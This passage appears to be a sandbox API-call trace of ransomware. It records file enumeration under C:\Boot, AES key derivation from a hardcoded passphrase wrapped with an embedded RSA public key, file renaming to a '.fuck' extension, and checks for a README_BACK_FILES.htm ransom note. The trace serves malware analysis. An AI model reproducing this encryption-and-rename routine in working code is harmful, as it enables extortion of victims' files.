phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.739] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.739] CryptHashData (hHash=0x2716b68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.739] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.739] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.739] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.739] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782a08) returned 1 [0231.739] CryptImportPublicKeyInfo (in: hCryptProv=0x2782a08, dwCertEncodingType=0x1, pInfo=0x277bcc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277bcf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277bcf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717028) returned 1 [0231.739] CryptEncrypt (in: hKey=0x2717028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.739] CryptEncrypt (in: hKey=0x2717028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782298*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2782298*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.740] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782298, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.740] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.740] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.740] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.740] CloseHandle (hObject=0xffffffff) returned 1 [0231.740] CloseHandle (hObject=0xffffffff) returned 1 [0231.740] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.740] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.741] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg")) returned 0 [0231.741] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.fuck")) returned 0 [0231.741] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.741] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.741] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.741] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.741] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.741] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.741] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-cs\\readme_back_files.htm")) returned 0x20 [0231.742] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.742] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sr-Latn-RS\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.742] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.742] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.742] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.742] GetLastError () returned 0x12 [0231.742] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui")) returned 0x20 [0231.743] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.743] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.743] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.743] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.743] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.745] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.745] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.745] CryptHashData (hHash=0x2716b68, pbData=0x2ec710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.745] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.745] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.745] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.745] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782320) returned 1 [0231.746] CryptImportPublicKeyInfo (in: hCryptProv=0x2782320, dwCertEncodingType=0x1, pInfo=0x277d110*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d140*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d148*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27170e8) returned 1 [0231.746] CryptEncrypt (in: hKey=0x27170e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.746] CryptEncrypt (in: hKey=0x27170e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781cc0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781cc0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.746] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781cc0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.746] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.746] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.746] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.746] CloseHandle (hObject=0xffffffff) returned 1 [0231.746] CloseHandle (hObject=0xffffffff) returned 1 [0231.746] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.746] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.747] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.gsg")) returned 0 [0231.747] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.fuck")) returned 0 [0231.747] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.747] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.747] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.747] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.747] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.747] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.747] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-RS\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sr-latn-rs\\readme_back_files.htm")) returned 0x20 [0231.748] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.748] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sv-SE\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716c68 [0231.749] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.749] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.749] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.749] GetLastError () returned 0x12 [0231.749] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0231.750] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.750] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.750] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.750] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.750] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.752] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.752] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.752] CryptHashData (hHash=0x2716aa8, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.752] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.752] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.753] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.753] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782100) returned 1 [0231.753] CryptImportPublicKeyInfo (in: hCryptProv=0x2782100, dwCertEncodingType=0x1, pInfo=0x277c4e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c510*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c518*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717368) returned 1 [0231.753] CryptEncrypt (in: hKey=0x2717368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.753] CryptEncrypt (in: hKey=0x2717368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781c38*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781c38*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.753] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781c38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.753] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.753] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.753] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.753] CloseHandle (hObject=0xffffffff) returned 1 [0231.753] CloseHandle (hObject=0xffffffff) returned 1 [0231.753] CopyFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.754] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.754] DeleteFileA (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.gsg")) returned 0 [0231.754] MoveFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.fuck")) returned 0 [0231.754] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.754] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.754] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.754] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.755] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.755] GetLastError () returned 0x5 [0231.755] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui")) returned 0x20 [0231.755] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.755] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.755] CreateFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.755] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.756] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.757] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.757] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.757] CryptHashData (hHash=0x2716ce8, pbData=0x2ec8c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.757] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716ce8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716aa8) returned 1 [0231.758] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.758] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.758] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781d48) returned 1 [0231.758] CryptImportPublicKeyInfo (in: hCryptProv=0x2781d48, dwCertEncodingType=0x1, pInfo=0x277cb60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277cb90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277cb98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717068) returned 1 [0231.758] CryptEncrypt (in: hKey=0x2717068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.758] CryptEncrypt (in: hKey=0x2717068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781dd0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781dd0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.758] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781dd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.758] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.758] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.758] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.758] CloseHandle (hObject=0xffffffff) returned 1 [0231.758] CloseHandle (hObject=0xffffffff) returned 1 [0231.758] CopyFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.759] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.759] DeleteFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg")) returned 0 [0231.759] MoveFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.fuck")) returned 0 [0231.759] CryptDestroyHash (hHash=0x2716ce8) returned 1 [0231.759] CryptDestroyKey (hKey=0x2716aa8) returned 1 [0231.760] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.760] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.760] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.760] FindClose (in: hFindFile=0x2716c68 | out: hFindFile=0x2716c68) returned 1 [0231.760] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sv-se\\readme_back_files.htm")) returned 0x20 [0231.761] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.761] FindFirstFileA (in: lpFileName="C:\\\\Boot\\tr-TR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.763] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.763] FindNextFileA (in: hFindFile=0x2716aa8, 